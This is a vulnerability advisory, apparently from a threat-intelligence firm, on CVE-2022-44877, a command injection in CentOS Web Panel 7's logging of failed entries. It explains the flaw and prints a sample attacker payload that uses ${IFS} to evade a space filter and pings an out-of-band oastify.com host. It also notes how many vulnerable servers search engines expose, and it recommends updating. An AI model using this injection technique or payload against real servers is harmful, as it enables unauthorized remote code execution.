| Category:
Vulnerability Intelligence |
Vulnerability Class:
Remote Code Execution |
CVE ID:
CVE-2022-44877 |
CVSS:3.0 Score:
NA(Not Assigned) |
Executive Summary
| THREAT |
IMPACT |
MITIGATION |
- A new remote command execution vulnerability was found in the web management portal of Centos(Control) web panel 7.
- A threat actor can easily exploit the vulnerability with a crafted HTTP request.
|
- The vulnerability can be leveraged to obtain a reverse shell and maintain persistence
- A remote unauthenticated threat actor can perform ransomware attacks or exfiltrate data.
|
- Update to the latest version as this affects Centos Web Panel 7 < v0.9.8.1147
- The latest version - v0.9.8.1148
|
Investigation and Analysis
CloudSEK’s Threat Research team conducted an investigation to understand the technical details of CVE-2022-44877, and the internet-wide exploitation of CentOS Web Panel 7 installations.
Through the course of our research, we discovered that post-exploitation, an attacker can execute commands remotely at the same privilege level the CentOS Web Panel is installed. In multiple cases, it was identified that the default privilege to host the installation was
‘root’ which is equivalent to the
‘Administrator’ privilege on Windows
.
Technical Analysis - Proof of Concept Code
A security researcher released the POC on
github and a POC video on
Youtube on 5th Jan 2023 after getting assurance from the Centos team that a sufficient number of servers were patched.
Upon analysis of the shared exploit code, it was identified that the flaw resided in the functionality which logged incorrect entries on the panel. Following is a sample code snippet responsible for writing content in the filename “
wrong_entry.log”
| echo “incorrect_entry, IP address, HTTP_request_URI” >> ./wrong_entry.log |
The double quotes in the above command are responsible for this misconfiguration, as this is a bash feature that helps execute a command. Since the HTTP_request_URI is attacker-controlled, a Threat Actor can insert a command that gets executed on the server.
When the above command is executed we get a connection back to the listener shell.
[caption id="attachment_22206" align="alignnone" width="1115"]
Illustration of 2 shells[/caption]
There are multiple vulnerable servers in the wild and threat actors have started exploiting them using the below-mentioned exploit payload.
[caption id="attachment_22207" align="alignnone" width="1218"]
The sample payload[/caption]
Understanding the Payload
- ping${IFS}-nc${IFS}2${IFS}222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com can be simplified to ping -nc 2 222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com
- The ${IFS} is a bash variable to give one space character. This is used to bypass the blank space bad character check.
- Hence, we are trying to get a pingback from the vulnerable server.
[caption id="attachment_22208" align="alignnone" width="887"]
We get the following DNS interaction from the vulnerable server[/caption]
Information from OSINT - Exploitability & Presence
The Centos Web Panel 7 is a widely used server management tool. A Shodan query for it results in ~436,000 servers which could be potentially vulnerable to the Remote code execution vulnerability.
[caption id="attachment_22209" align="alignnone" width="1681"]
Shodan search query showing vulnerable servers[/caption]
The same pattern can also be observed from other search engines like Censys.
[caption id="attachment_22210" align="alignnone" width="1582"]
Censys search query showing vulnerable servers[/caption]
Mitigation
A high impact vulnerability that is also easily exploitable, is a prime target for threat actors. And given that the POC is now public, it makes the threat actors’ job that much easier. Hence we recommend that users update to the latest version,
v0.9.8.1148.
References
